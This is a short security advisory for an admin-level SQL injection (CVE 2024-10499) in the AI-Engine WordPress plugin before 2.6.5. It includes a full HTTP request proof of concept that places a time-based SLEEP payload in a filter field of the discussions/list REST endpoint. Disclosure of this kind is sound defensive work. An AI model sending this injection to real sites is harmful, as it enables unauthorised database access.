AI-Engine < 2.6.5 – Admin+ SQLi | CVE 2024-10499

Description

The plugin does not sanitize and escape a parameter from one of its RESP API endpoint before using it in a SQL statement, allowing admins to perform SQL injection attacks

Proof of Concept

In the admin console, go to “Meow Apps -> AI Engine -> Settings (Tab)” and enable the “Discussions” option in the Chatbot section.

Generate a request like the following:

```
POST /wp-json/mwai/v1/discussions/list HTTP/1.1
Host: redacted
Content-Length: 146
Pragma: no-cache
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
X-WP-Nonce: 60f697c9d3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://redacted
Referer: http://redacted/wp-admin/admin.php?page=mwai_settings&nekoTab=settings
Accept-Encoding: gzip, deflate, br
Cookie: redacted;
Connection: keep-alive

{
    "offset": 0,
    "limit": 0,
    "filters":[
        {
            "accessor": "preview",
            "value": "qqqqq' AND (SELECT 1 WHERE SLEEP(10))-- "
        }
    ],
    "sort": "DESC"
}
```

You will notice the 10-second delay in response which demonstrates the SQL injection